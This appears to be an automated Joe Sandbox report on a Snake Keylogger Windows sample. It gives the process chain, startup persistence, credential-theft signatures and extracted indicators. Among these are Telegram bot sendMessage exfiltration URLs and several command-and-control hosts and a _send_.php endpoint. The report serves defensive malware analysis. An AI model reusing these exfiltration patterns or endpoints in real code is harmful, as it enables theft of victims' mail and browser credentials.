                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Behavior Graph ID: 1588271 | Sample: 6cicUo3f8g.exe | Startdate: 10/01/2025 | Architecture: WINDOWS | Score: 100
                Contacted domains: reallyfreegeoip.org, api.telegram.org, 3 other IPs or domains
                Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
                api.telegram.org: Uses the Telegram API (likely for C&C communication)
                6cicUo3f8g.exe (started) | dropped: C:\Users\user\AppData\Local\...\toggeries.exe, PE32 | Binary is likely a compiled AutoIt script file | started: toggeries.exe
                wscript.exe (started) | Windows Scripting host queries suspicious COM object (likely to drop second stage) | started: toggeries.exe
                toggeries.exe (from 6cicUo3f8g.exe) | dropped: C:\Users\user\AppData\...\toggeries.vbs, data | Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures | started: RegSvcs.exe
                toggeries.exe (from wscript.exe) | Writes to foreign memory regions; Maps a DLL or memory area into another process | started: RegSvcs.exe
                RegSvcs.exe (from toggeries.exe, first chain) | checkip.dyndns.com 132.226.247.73, ports 49716, 49734, 49746, UTMEMUS, United States | api.telegram.org 149.154.167.220, ports 443, 49811, 61868, TELEGRAMRU, United Kingdom | reallyfreegeoip.org 104.21.32.1, ports 443, 49722, 49728, CLOUDFLARENETUS, United States
                RegSvcs.exe (from toggeries.exe, second chain) | Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label | Link
6cicUo3f8g.exe | 83% | ReversingLabs | Win32.Spyware.Snakekeylogger |
6cicUo3f8g.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Thebesian\toggeries.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Thebesian\toggeries.exe | 83% | ReversingLabs | Win32.Spyware.Snakekeylogger |
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.32.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
206.23.85.13.in-addr.arpa | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000008.00000002.4584508040.000000000270A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | RegSvcs.exe, 00000008.00000002.4592912814.0000000005B10000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.4584887740.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002714000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000008.00000002.4584508040.00000000026E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000003.00000002.4584887740.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.32.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588271
Start date and time: 2025-01-10 23:18:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 6cicUo3f8g.exe (renamed because the original name is a hash value)
Original Sample Name: f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@5/3
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 57
• Number of non-executed functions: 274
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 13.85.23.206, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 1672 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: 6cicUo3f8g.exe
Time | Type | Description
17:19:16 | API Interceptor | 12690711x Sleep call for process: RegSvcs.exe modified
23:19:16 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              104.21.32.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.mzkd6gp5.top/3u0p/
                                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                              • redroomaudio.com/administrator/index.php
                                                                                                              132.226.247.73rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.80.1
reallyfreegeoip.org | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
reallyfreegeoip.org | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.48.1
reallyfreegeoip.org | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
checkip.dyndns.com | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
checkip.dyndns.com | UF7jzc7ETP.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | VQsnGWaNi5.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
api.telegram.org | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
UTMEMUS | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
UTMEMUS | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
UTMEMUS | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
UTMEMUS | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
UTMEMUS | UF7jzc7ETP.exe | malicious | MassLogger RAT | 132.226.8.169
UTMEMUS | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
UTMEMUS | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
UTMEMUS | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
UTMEMUS | upXUt2jZ0S.exe | malicious | Snake Keylogger | 132.226.247.73
CLOUDFLARENETUS | Full-Ver_Setup.exe | malicious | LummaC Stealer | 104.21.11.60
CLOUDFLARENETUS | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.80.1
CLOUDFLARENETUS | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
CLOUDFLARENETUS | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
CLOUDFLARENETUS | gH3LlhcRzg.exe | malicious | FormBook | 104.21.96.1
CLOUDFLARENETUS | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
CLOUDFLARENETUS | M7XS5C07kV.exe | malicious | FormBook | 172.67.186.192
CLOUDFLARENETUS | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.48.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 7b4Iaf58Rp.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.32.1
54328bd36c14bd82ddaa0c04b25ed9ad | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
3b5074b1b5d032e5620f69f9f700ff0e | C5JLkBS1CX.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 3j7f6Bv4FT.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 3j7f6Bv4FT.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | iRmpdWgpoF.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
No context
Process: C:\Users\user\Desktop\6cicUo3f8g.exe
File Type: data
Category: dropped
